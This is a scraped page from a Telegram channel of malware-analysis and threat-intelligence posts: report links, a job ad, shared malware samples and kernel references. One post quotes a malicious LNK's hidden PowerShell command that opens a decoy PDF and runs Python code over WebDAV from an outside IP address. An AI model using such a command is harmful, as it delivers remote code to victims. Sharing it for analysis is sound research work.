ch
Feedback
Source Byte

Source Byte

前往频道在 Telegram

هشیار کسی باید کز عشق بپرهیزد وین طبع که من دارم با عقل نیامیزد Saadi Shirazi 187

显示更多
7 849
订阅者
+1024 小时
+467
+18730
帖子存档
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations https://securelist.com/cyber-anarchy-s
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/

Dark web threats and dark market predictions for 2025 https://securelist.com/ksb-dark-web-predictions-2025/114966/
Dark web threats and dark market predictions for 2025
https://securelist.com/ksb-dark-web-predictions-2025/114966/

Agent Tesla Analysis [Part 1: Unpacking] https://ryan-weil.github.io/posts/AGENT-TESLA-1/ Deobfuscation of Lumma Stealer http
Agent Tesla Analysis [Part 1: Unpacking]
https://ryan-weil.github.io/posts/AGENT-TESLA-1/
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/

Hi one-thing i forgot to mention :/ these opportunity jobs are CTI & TR at the time and it only available in Tehran have a nice day 😬

There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] . [ + ] Familiarity with reverse engineering and malware analysis. [ + ] Familiarity with one of the programming languages ​​Python, C/Cpp. [ + ] Familiarity with Linux operating system [ + ] Familiarity with security concepts. [ + ] Familiarity with Python, PowerShell and Bash scripting. [ + ] Familiarity with cyber attacks Skills that are considered as advantages: [ + ] Familiarity with Threat Intelligence [ + ] Familiarity with CTI concepts [ + ] Mastery of reverse engineering and binary analysis [ + ] Familiarity with Windows/Linux internals

19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc.lnk0.03 KB

or even run python remotely
-w hid -nop  -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"

fdc240fb8f4a17e6a2b0d26635d8ab613db89135a5d95834c5a888423d2b1c82.zip9.09 KB

https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/ lnk are so strange you can literally do anything with them
https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/ lnk are so strange you can literally do anything with them and yet no security log to detect them :(

Repost from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Inf
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Infosec_Fortress

.

photo content

Thanks " a gh " for sharing missing files ( two windows event logs ) password is infected

Just an attempt to group extracted data from Defender for research purposes. https://github.com/HackingLZ/ExtractedDefender credits : Justin Elze

Catalog of key Windows kernel data structures https://codemachine.com/articles/kernel_structures.html Understanding EProcess
Catalog of key Windows kernel data structures https://codemachine.com/articles/kernel_structures.html Understanding EProcess Structure https://info-savvy.com/understanding-eprocess-structure/ Thanks to https://x.com/5mukx